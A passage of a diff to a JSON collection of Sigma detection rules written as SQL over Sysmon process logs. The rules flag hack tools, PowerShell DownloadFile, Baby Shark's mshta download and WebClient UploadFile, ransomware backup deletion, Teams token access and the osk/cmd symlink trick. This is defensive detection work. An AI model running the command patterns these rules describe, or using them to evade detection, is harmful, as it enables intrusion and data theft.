"Florian Roth (Nextron Systems)", + "title": "HackTool - SharpChisel Execution", + "id": "cf93e05e-d798-4d9e-b522-b0248dc61eaf", + "status": "experimental", + "description": "Detects usage of the Sharp Chisel via the commandline arguments", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1562.001" + "attack.command_and_control", + "attack.t1090.001" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '% -name IEHarden %' ESCAPE '\\' AND CommandLine LIKE '% -value 0 %' ESCAPE '\\') OR (CommandLine LIKE '% -name DEPOff %' ESCAPE '\\' AND CommandLine LIKE '% -value 1 %' ESCAPE '\\') OR (CommandLine LIKE '% -name DisableFirstRunCustomize %' ESCAPE '\\' AND CommandLine LIKE '% -value 2 %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE 
'%\\\\SharpChisel.exe' ESCAPE '\\' OR Product = 'SharpChisel'))" ], - "filename": "proc_creation_win_powershell_disable_ie_features.yml" + "filename": "proc_creation_win_hktl_sharp_chisel.yml" }, { - "title": "MERCURY APT Activity", - "id": "a62298a3-1fe0-422f-9a68-ffbcbc5a123d", - "status": "experimental", - "description": "Detects suspicious command line patterns seen being used by MERCURY APT", + "title": "PowerShell DownloadFile", + "id": "8f70ac5f-1f6f-4f8e-b454-db19561216c5", + "status": "test", + "description": "Detects the execution of powershell, a WebClient object creation and the invocation of DownloadFile in a single command line", "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.execution", "attack.t1059.001", - "attack.g0069" + "attack.command_and_control", + "attack.t1104", + "attack.t1105" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%-exec bypass -w 1 -enc%' ESCAPE '\\' AND CommandLine LIKE '%UwB0AGEAcgB0AC0ASgBvAGIAIAAtAFMAYwByAGkAcAB0AEIAbABvAGMAawAgAHsAKABzAGEAcABzACAAKAAiAHAA%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%powershell%' ESCAPE '\\' AND CommandLine LIKE '%.DownloadFile%' ESCAPE '\\' AND CommandLine LIKE '%System.Net.WebClient%' ESCAPE '\\')" ], - "filename": "proc_creation_win_apt_mercury.yml" + "filename": "proc_creation_win_powershell_susp_ps_downloadfile.yml" }, { - "title": "AADInternals PowerShell Cmdlets Execution - ProccessCreation", - "id": "c86500e9-a645-4680-98d7-f882c70c1ea3", + "title": "Console CodePage Lookup Via CHCP", + "id": "7090adee-82e2-4269-bd59-80691e7c6338", "status": "experimental", - "description": "Detects ADDInternals Cmdlet execution. A tool for administering Azure AD and Office 365. 
Which can be abused by threat actors to attack Azure AD or Office 365.", - "author": "Austin Songer (@austinsonger), Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects use of chcp to look up the system locale value as part of host discovery", + "author": "_pete_0, TheDFIRReport", "tags": [ - "attack.execution", - "attack.reconnaissance", "attack.discovery", - "attack.credential_access", - "attack.impact" + "attack.t1614.001" ], "falsepositives": [ - "Legitimate use of the library for administrative activity" + "During Anaconda update the 'conda.exe' process will eventually execution the 'chcp' command." ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.Exe', 'pwsh.dll')) AND (CommandLine LIKE '%Add-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%ConvertTo-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Disable-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Enable-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Export-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Get-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Grant-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Install-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Join-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%New-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Open-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Read-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Register-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Remove-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Restore-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Search-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Send-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Set-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Start-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Update-AADInt%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND 
Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\cmd.exe' ESCAPE '\\' AND (ParentCommandLine LIKE '% /c %' ESCAPE '\\' OR ParentCommandLine LIKE '% /r %' ESCAPE '\\' OR ParentCommandLine LIKE '% /k %' ESCAPE '\\') AND Image LIKE '%\\\\chcp.com' ESCAPE '\\' AND (CommandLine LIKE '%chcp' ESCAPE '\\' OR CommandLine LIKE '%chcp ' ESCAPE '\\' OR CommandLine LIKE '%chcp ' ESCAPE '\\'))" ], - "filename": "proc_creation_win_powershell_aadinternals_cmdlets_execution.yml" + "filename": "proc_creation_win_chcp_codepage_lookup.yml" }, { - "title": "HackTool - SILENTTRINITY Stager Execution", - "id": "03552375-cc2c-4883-bbe4-7958d5a980be", + "title": "Windows Shell/Scripting Processes Spawning Suspicious Programs", + "id": "3a6586ad-127a-4d3b-a677-1e6eacdf8fde", "status": "test", - "description": "Detects SILENTTRINITY stager use via PE metadata", - "author": "Aleksey Potapov, oscd.community", + "description": "Detects suspicious child processes of a Windows shell and scripting processes such as wscript, rundll32, powershell, mshta...etc.", + "author": "Florian Roth (Nextron Systems), Tim Shelton", "tags": [ - "attack.command_and_control", - "attack.t1071" + "attack.execution", + "attack.defense_evasion", + "attack.t1059.005", + "attack.t1059.001", + "attack.t1218" ], "falsepositives": [ - "Unlikely" + "Administrative scripts", + "Microsoft SCCM" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Description LIKE '%st2stager%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ParentImage LIKE '%\\\\mshta.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\cscript.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\wscript.exe' ESCAPE '\\' OR ParentImage LIKE 
'%\\\\wmiprvse.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\regsvr32.exe' ESCAPE '\\') AND (Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR Image LIKE '%\\\\nslookup.exe' ESCAPE '\\' OR Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\')) AND NOT ((CurrentDirectory LIKE '%\\\\ccmcache\\\\%' ESCAPE '\\') OR ((ParentCommandLine LIKE '%\\\\Program Files\\\\Amazon\\\\WorkSpacesConfig\\\\Scripts\\\\setup-scheduledtask.ps1%' ESCAPE '\\' OR ParentCommandLine LIKE '%\\\\Program Files\\\\Amazon\\\\WorkSpacesConfig\\\\Scripts\\\\set-selfhealing.ps1%' ESCAPE '\\' OR ParentCommandLine LIKE '%\\\\Program Files\\\\Amazon\\\\WorkSpacesConfig\\\\Scripts\\\\check-workspacehealth.ps1%' ESCAPE '\\' OR ParentCommandLine LIKE '%\\\\nessus\\_%' ESCAPE '\\')) OR (CommandLine LIKE '%\\\\nessus\\_%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_hktl_silenttrinity_stager.yml" + "filename": "proc_creation_win_susp_shell_spawn_susp_program.yml" }, { - "title": "Suspicious Usage Of ShellExec_RunDLL", - "id": "d87bd452-6da1-456e-8155-7dc988157b7d", - "status": "experimental", - "description": "Detects suspicious usage of the ShellExec_RunDLL function to launch other commands as seen in the the raspberry-robin attack", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Potential Baby Shark Malware Activity", + "id": "2b30fa36-3a18-402f-a22d-bf4ce2189f35", + "status": "test", + "description": "Detects activity that could be related to Baby Shark malware", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion" + "attack.execution", + "attack.defense_evasion", + "attack.discovery", + "attack.t1012", + "attack.t1059.003", + "attack.t1059.001", + "attack.t1218.005" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%ShellExec\\_RunDLL%' ESCAPE 
'\\' AND (CommandLine LIKE '%regsvr32%' ESCAPE '\\' OR CommandLine LIKE '%msiexec%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%odbcconf%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-%' ESCAPE '\\' OR CommandLine LIKE '%iex%' ESCAPE '\\' OR CommandLine LIKE '%comspec%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%powershell.exe mshta.exe http%' ESCAPE '\\' AND CommandLine LIKE '%.hta%' ESCAPE '\\') OR (CommandLine LIKE '%reg query \"HKEY\\_CURRENT\\_USER\\\\Software\\\\Microsoft\\\\Terminal Server Client\\\\Default\"%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /c taskkill /im cmd.exe%' ESCAPE '\\' OR CommandLine LIKE '%(New-Object System.Net.WebClient).UploadFile(''http%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_rundll32_susp_shellexec_execution.yml" + "filename": "proc_creation_win_malware_babyshark.yml" }, { - "title": "Potential File Overwrite Via Sysinternals SDelete", - "id": "a4824fca-976f-4964-b334-0621379e84c4", - "status": "experimental", - "description": "Detects the use of SDelete to erase a file not the free space", - "author": "frack113", + "title": "Visual Basic Command Line Compiler Usage", + "id": "7b10f171-7f04-47c7-9fa2-5be43c76e535", + "status": "test", + "description": "Detects successful code compilation via Visual Basic Command Line Compiler that utilizes Windows Resource to Object Converter.", + "author": "Ensar Şamil, @sblmsrsn, @oscd_initiative", "tags": [ - "attack.impact", - "attack.t1485" + "attack.defense_evasion", + "attack.t1027.004" ], "falsepositives": [ - "Unknown" + "Utilization of this tool should not be seen in enterprise environment" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND OriginalFileName 
= 'sdelete.exe' AND NOT ((CommandLine LIKE '% -h%' ESCAPE '\\' OR CommandLine LIKE '% -c%' ESCAPE '\\' OR CommandLine LIKE '% -z%' ESCAPE '\\' OR CommandLine LIKE '% /\\?%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\vbc.exe' ESCAPE '\\' AND Image LIKE '%\\\\cvtres.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_sysinternals_sdelete.yml" + "filename": "proc_creation_win_lolbin_visual_basic_compiler.yml" }, { - "title": "SystemStateBackup Deleted Using Wbadmin.EXE", - "id": "89f75308-5b1b-4390-b2d8-d6b2340efaf8", + "title": "Suspicious Atbroker Execution", + "id": "f24bcaea-0cd1-11eb-adc1-0242ac120002", "status": "test", - "description": "Deletes the Windows systemstatebackup using wbadmin.exe.\nThis technique is used by numerous ransomware families.\nThis may only be successful on server platforms that have Windows Backup enabled.\n", - "author": "frack113", + "description": "Atbroker executing non-deafualt Assistive Technology applications", + "author": "Mateusz Wydra, oscd.community", "tags": [ - "attack.impact", - "attack.t1490" + "attack.defense_evasion", + "attack.t1218" ], "falsepositives": [ - "Unknown" + "Legitimate, non-default assistive technology applications execution" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\wbadmin.exe' ESCAPE '\\' OR OriginalFileName = 'WBADMIN.EXE') AND (CommandLine LIKE '%delete %' ESCAPE '\\' AND CommandLine LIKE '%systemstatebackup %' ESCAPE '\\' AND CommandLine LIKE '%-keepVersions:0%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%AtBroker.exe' ESCAPE '\\' AND CommandLine LIKE '%start%' ESCAPE '\\') AND NOT ((CommandLine LIKE '%animations%' ESCAPE '\\' OR CommandLine LIKE '%audiodescription%' ESCAPE '\\' OR CommandLine LIKE 
'%caretbrowsing%' ESCAPE '\\' OR CommandLine LIKE '%caretwidth%' ESCAPE '\\' OR CommandLine LIKE '%colorfiltering%' ESCAPE '\\' OR CommandLine LIKE '%cursorscheme%' ESCAPE '\\' OR CommandLine LIKE '%filterkeys%' ESCAPE '\\' OR CommandLine LIKE '%focusborderheight%' ESCAPE '\\' OR CommandLine LIKE '%focusborderwidth%' ESCAPE '\\' OR CommandLine LIKE '%highcontrast%' ESCAPE '\\' OR CommandLine LIKE '%keyboardcues%' ESCAPE '\\' OR CommandLine LIKE '%keyboardpref%' ESCAPE '\\' OR CommandLine LIKE '%magnifierpane%' ESCAPE '\\' OR CommandLine LIKE '%messageduration%' ESCAPE '\\' OR CommandLine LIKE '%minimumhitradius%' ESCAPE '\\' OR CommandLine LIKE '%mousekeys%' ESCAPE '\\' OR CommandLine LIKE '%Narrator%' ESCAPE '\\' OR CommandLine LIKE '%osk%' ESCAPE '\\' OR CommandLine LIKE '%overlappedcontent%' ESCAPE '\\' OR CommandLine LIKE '%showsounds%' ESCAPE '\\' OR CommandLine LIKE '%soundsentry%' ESCAPE '\\' OR CommandLine LIKE '%stickykeys%' ESCAPE '\\' OR CommandLine LIKE '%togglekeys%' ESCAPE '\\' OR CommandLine LIKE '%windowarranging%' ESCAPE '\\' OR CommandLine LIKE '%windowtracking%' ESCAPE '\\' OR CommandLine LIKE '%windowtrackingtimeout%' ESCAPE '\\' OR CommandLine LIKE '%windowtrackingzorder%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_wbadmin_delete_systemstatebackup.yml" + "filename": "proc_creation_win_lolbin_susp_atbroker.yml" }, { - "title": "Suspicious Command With Teams Objects Paths", - "id": "d2eb17db-1d39-41dc-b57f-301f6512fa75", + "title": "Shell32 DLL Execution in Suspicious Directory", + "id": "32b96012-7892-429e-b26c-ac2bf46066ff", "status": "experimental", - "description": "Detects an access to authentication tokens and accounts of Microsoft Teams desktop application.", - "author": "@SerkinValery", + "description": "Detects shell32.dll executing a DLL in a suspicious directory", + "author": "Christian Burkard (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1528" + "attack.defense_evasion", + "attack.execution", + 
"attack.t1218.011" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%\\\\Microsoft\\\\Teams\\\\Cookies%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Microsoft\\\\Teams\\\\Local Storage\\\\leveldb%' ESCAPE '\\') AND NOT (Image LIKE '%\\\\Microsoft\\\\Teams\\\\current\\\\Teams.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND (CommandLine LIKE '%shell32.dll%' ESCAPE '\\' AND CommandLine LIKE '%Control\\_RunDLL%' ESCAPE '\\' AND (CommandLine LIKE '%\\%AppData\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%LocalAppData\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%Temp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%tmp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_teams_suspicious_command_line_cred_access.yml" + "filename": "proc_creation_win_rundll32_shell32_susp_execution.yml" }, { - "title": "PUA - Seatbelt Execution", - "id": "38646daa-e78f-4ace-9de0-55547b2d30da", + "title": "ShimCache Flush", + "id": "b0524451-19af-4efa-a46f-562a977f792e", + "status": "stable", + "description": "Detects actions that clear the local ShimCache and remove forensic evidence", + "author": "Florian Roth (Nextron Systems)", + "tags": [ + "attack.defense_evasion", + "attack.t1112" + ], + "falsepositives": [ + "Unknown" + ], + "level": "high", + "rule": [ + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%rundll32%' ESCAPE '\\' AND CommandLine LIKE '%apphelp.dll%' ESCAPE '\\' AND (CommandLine LIKE '%ShimFlushCache%' ESCAPE '\\' OR CommandLine LIKE '%#250%' ESCAPE '\\')) OR 
(CommandLine LIKE '%rundll32%' ESCAPE '\\' AND CommandLine LIKE '%kernel32.dll%' ESCAPE '\\' AND (CommandLine LIKE '%BaseFlushAppcompatCache%' ESCAPE '\\' OR CommandLine LIKE '%#46%' ESCAPE '\\'))))" + ], + "filename": "proc_creation_win_rundll32_susp_shimcache_flush.yml" + }, + { + "title": "Potential Privilege Escalation Using Symlink Between Osk and Cmd", + "id": "e9b61244-893f-427c-b287-3e708f321c6b", "status": "experimental", - "description": "Detects the execution of the PUA/Recon tool Seatbelt via PE information of command line parameters", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the creation of a symbolic link between \"cmd.exe\" and the accessibility on-screen keyboard binary (osk.exe) using \"mklink\". This technique provides an elevated command prompt to the user from the login screen without the need to log in.", + "author": "frack113", "tags": [ - "attack.discovery", - "attack.t1526", - "attack.t1087", - "attack.t1083" + "attack.credential_access", + "attack.t1546.008" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\Seatbelt.exe' ESCAPE '\\' OR OriginalFileName = 'Seatbelt.exe' OR Description = 'Seatbelt' OR (CommandLine LIKE '% DpapiMasterKeys%' ESCAPE '\\' OR CommandLine LIKE '% InterestingProcesses%' ESCAPE '\\' OR CommandLine LIKE '% InterestingFiles%' ESCAPE '\\' OR CommandLine LIKE '% CertificateThumbprints%' ESCAPE '\\' OR CommandLine LIKE '% ChromiumBookmarks%' ESCAPE '\\' OR CommandLine LIKE '% ChromiumHistory%' ESCAPE '\\' OR CommandLine LIKE '% ChromiumPresence%' ESCAPE '\\' OR CommandLine LIKE '% CloudCredentials%' ESCAPE '\\' OR CommandLine LIKE '% CredEnum%' ESCAPE '\\' OR CommandLine LIKE '% CredGuard%' ESCAPE '\\' OR CommandLine LIKE '% FirefoxHistory%' ESCAPE '\\' OR CommandLine LIKE '% ProcessCreationEvents%' ESCAPE '\\')) OR ((CommandLine LIKE 
'% -group=misc%' ESCAPE '\\' OR CommandLine LIKE '% -group=remote%' ESCAPE '\\' OR CommandLine LIKE '% -group=chromium%' ESCAPE '\\' OR CommandLine LIKE '% -group=slack%' ESCAPE '\\' OR CommandLine LIKE '% -group=system%' ESCAPE '\\' OR CommandLine LIKE '% -group=user%' ESCAPE '\\' OR CommandLine LIKE '% -group=all%' ESCAPE '\\') AND CommandLine LIKE '% -outputfile=%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR OriginalFileName = 'Cmd.Exe') AND (CommandLine LIKE '%mklink%' ESCAPE '\\' AND CommandLine LIKE '%\\\\osk.exe%' ESCAPE '\\' AND CommandLine LIKE '%\\\\cmd.exe%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_pua_seatbelt.yml" + "filename": "proc_creation_win_cmd_mklink_osk_cmd.yml" }, { - "title": "DLL Sideloading by VMware Xfer Utility", - "id": "ebea773c-a8f1-42ad-a856-00cb221966e8", + "title": "7Zip Compressing Dump Files", + "id": "ec570e53-4c76-45a9-804d-dc3f355ff7a7", "status": "experimental", - "description": "Detects execution of VMware Xfer utility (VMwareXferlogs.exe) from the non-default directory which may be an attempt to sideload arbitrary DLL", + "description": "Detects a suspicious 7zip execution that involves a file with a \".dmp\"/\".dump\" extension, which could be a step in a process of dump file exfiltration", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1574.002" + "attack.collection", + "attack.t1560.001" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Image LIKE '%\\\\VMwareXferlogs.exe' ESCAPE '\\' AND NOT (Image LIKE 'C:\\\\Program Files\\\\VMware\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Description LIKE '%7-Zip%' ESCAPE '\\' OR (Image LIKE 
'%\\\\7z.exe' ESCAPE '\\' OR Image LIKE '%\\\\7zr.exe' ESCAPE '\\' OR Image LIKE '%\\\\7za.exe' ESCAPE '\\') OR OriginalFileName IN ('7z.exe', '7za.exe')) AND (CommandLine LIKE '%.dmp%' ESCAPE '\\' OR CommandLine LIKE '%.dump%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_dll_sideload_vmware_xfer.yml" + "filename": "proc_creation_win_7zip_exfil_dmp_files.yml" }, { - "title": "HackTool - Dumpert Process Dumper Execution", - "id": "2704ab9e-afe2-4854-a3b1-0c0706d03578", + "title": "Serv-U Exploitation CVE-2021-35211 by DEV-0322", + "id": "75578840-9526-4b2a-9462-af469a45e767", "status": "test", - "description": "Detects the use of Dumpert process dumper, which dumps the lsass.exe process memory", + "description": "Detects patterns as noticed in exploitation of Serv-U CVE-2021-35211 vulnerability by threat group DEV-0322", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.persistence", + "attack.t1136.001", + "cve.2021.35211" ], "falsepositives": [ - "Very unlikely" + "Unlikely" ], "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Hashes LIKE '%09D278F9DE118EF09163C6140255C690%' ESCAPE '\\' OR CommandLine LIKE '%Dumpert.dll%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND CommandLine LIKE '%whoami%' ESCAPE '\\' AND ((CommandLine LIKE '%./Client/Common/%' ESCAPE '\\' OR CommandLine LIKE '%.\\\\Client\\\\Common\\\\%' ESCAPE '\\') OR CommandLine LIKE '%C:\\\\Windows\\\\Temp\\\\Serv-U.bat%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_dumpert.yml" + "filename": "proc_creation_win_exploit_cve_2021_35211_servu.yml" }, { - "title": "Suspicious MSHTA Child Process", - "id": "03cc0c25-389f-4bf8-b48d-11878079f1ca", + "title": "Conti Volume Shadow Listing", + "id": "7b30e0a7-c675-4b24-8a46-82fa67e2433d", "status": "test", - "description": "Detects 
a suspicious process spawning from an \"mshta.exe\" process, which could be indicative of a malicious HTA script execution", - "author": "Michael Haag", + "description": "Detects a command used by conti to find volume shadow backups", + "author": "Max Altgelt (Nextron Systems), Tobias Michalski (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218.005", - "car.2013-02-003", - "car.2013-03-001", - "car.2014-04-003" + "attack.t1587.001", + "attack.resource_development" ], "falsepositives": [ - "Printer software / driver installations", - "HP software" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ParentImage LIKE '%\\\\mshta.exe' ESCAPE '\\' AND ((Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\sh.exe' ESCAPE '\\' OR Image LIKE '%\\\\bash.exe' ESCAPE '\\' OR Image LIKE '%\\\\reg.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\bitsadmin.exe' ESCAPE '\\') OR OriginalFileName IN ('Cmd.Exe', 'PowerShell.EXE', 'pwsh.dll', 'wscript.exe', 'cscript.exe', 'Bash.exe', 'reg.exe', 'REGSVR32.EXE', 'bitsadmin.exe')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%vssadmin list shadows%' ESCAPE '\\' AND CommandLine LIKE '%log.txt%' ESCAPE '\\')" ], - "filename": "proc_creation_win_mshta_susp_child_processes.yml" + "filename": "proc_creation_win_malware_conti.yml" }, { - "title": "Possible Shim Database Persistence via sdbinst.exe", - "id": "517490a7-115a-48c6-8862-1a481504d5a8", - "status": "test", - "description": "Detects installation of a new shim using sdbinst.exe. 
A shim can be used to load malicious DLLs into applications.", - "author": "Markus Neis", + "title": "Rorschach Ransomware Execution Activity", + "id": "0e9e6c63-1350-48c4-9fa1-7ccb235edc68", + "status": "experimental", + "description": "Detects Rorschach ransomware execution activity", + "author": "X__Junior (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "attack.t1546.011" + "attack.execution", + "attack.t1059.003", + "attack.t1059.001", + "attack.defense_evasion" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\sdbinst.exe' ESCAPE '\\' AND CommandLine LIKE '%.sdb%' ESCAPE '\\') AND NOT (CommandLine LIKE '%iisexpressshim.sdb%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\bcdedit.exe' ESCAPE '\\' OR Image LIKE '%\\\\net.exe' ESCAPE '\\' OR Image LIKE '%\\\\net1.exe' ESCAPE '\\' OR Image LIKE '%\\\\netsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\wevtutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\vssadmin.exe' ESCAPE '\\') AND CommandLine LIKE '%11111111%' ESCAPE '\\')" ], - "filename": "proc_creation_win_sdbinst_shim_persistence.yml" + "filename": "proc_creation_win_malware_rorschach_ransomware_activity.yml" }, { - "title": "Invoke-Obfuscation Via Use Clip", - "id": "e1561947-b4e3-4a74-9bdd-83baed21bdb5", - "status": "test", - "description": "Detects Obfuscated Powershell via use Clip.exe in Scripts", - "author": "Nikita Nazarov, oscd.community", + "title": "System File Execution Location Anomaly", + "id": "e4a6b256-3e47-40fc-89d2-7a477edd6915", + "status": "experimental", + "description": "Detects a Windows program executable started from a suspicious folder", + "author": "Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali", 
"tags": [ "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.t1036" ], "falsepositives": [ - "Unknown" + "Exotic software" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%echo%' ESCAPE '\\' AND CommandLine LIKE '%clip%' ESCAPE '\\' AND CommandLine LIKE '%&&%' ESCAPE '\\' AND (CommandLine LIKE '%clipboard%' ESCAPE '\\' OR CommandLine LIKE '%invoke%' ESCAPE '\\' OR CommandLine LIKE '%i`%' ESCAPE '\\' OR CommandLine LIKE '%n`%' ESCAPE '\\' OR CommandLine LIKE '%v`%' ESCAPE '\\' OR CommandLine LIKE '%o`%' ESCAPE '\\' OR CommandLine LIKE '%k`%' ESCAPE '\\' OR CommandLine LIKE '%e`%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE 